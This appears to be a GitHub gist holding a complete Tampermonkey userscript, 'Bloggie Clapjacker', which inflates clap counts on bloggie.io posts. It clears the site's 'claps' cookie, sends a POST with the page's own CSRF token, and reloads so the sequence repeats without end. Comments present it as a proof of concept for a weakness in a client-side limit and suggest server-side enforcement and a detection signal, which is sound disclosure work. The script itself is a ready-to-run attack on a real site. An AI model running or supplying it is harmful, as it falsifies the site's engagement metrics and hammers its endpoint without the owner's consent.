Last active
September 26, 2019 04:43
Clapjack test on Bloggie.io
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
// ==UserScript==
// @name Bloggie Clapjacker
// @namespace http://tampermonkey.net/
// @version 0.3
// @description Find and hijack claps on bloggie.io posts
// @author You
// @match *://bloggie.io/@*/*
// @grant none
// ==/UserScript==

/*
 * Proof of concept for a clap-count integrity weakness. On every matched post
 * page it empties the `claps` cookie, sends one POST to the post's claps
 * endpoint using the CSRF token already present in the page, and reloads the
 * page so the same sequence runs again.
 *
 * Review notes:
 *  - The CSRF token is read from the page the script runs in, so the request
 *    is an ordinary same-origin request. CSRF protection stops cross-site
 *    forgery; it does not limit how often a visitor repeats an action.
 *  - The `claps` cookie is cleared before each request. That suggests (not
 *    confirmed by anything in this file) that the per-visitor clap allowance
 *    is tracked in a client-controlled cookie. A limit of this kind has to be
 *    enforced server-side, keyed to the account or session, with rate
 *    limiting on the endpoint itself.
 *  - Server-side signal: a steady series of POSTs to /posts/<slug>/claps from
 *    one session, each preceded by a full page load.
 */
(() => {
  // The post identifier is whatever follows the last "/" of the current URL.
  const pageUrl = location.href;
  const slug = pageUrl.slice(pageUrl.lastIndexOf("/") + 1);
  const clapUrl = `https://bloggie.io/posts/${slug}/claps`;

  // CSRF token as rendered into the page head by the site; a missing meta tag
  // throws here, before the cookie is touched or any request is sent.
  const tokenMeta = document.querySelector("meta[name='csrf-token']");
  const csrfToken = tokenMeta.getAttribute("content");

  // Empties the `claps` cookie; `expires` is set to the current time as an
  // epoch-millisecond number.
  document.cookie = `claps=; expires=${+new Date()}; domain=${document.domain}; path=/`;

  // One clap, sent with the visitor's own cookies and the page's CSRF token.
  const request = {
    method: "POST",
    credentials: "include" /* send cookies with the request */,
    headers: { "x-csrf-token": csrfToken },
  };

  fetch(clapUrl, request).then(() => {
    // Reloading re-runs this userscript, so the sequence repeats indefinitely.
    location.reload(true);
  });
})();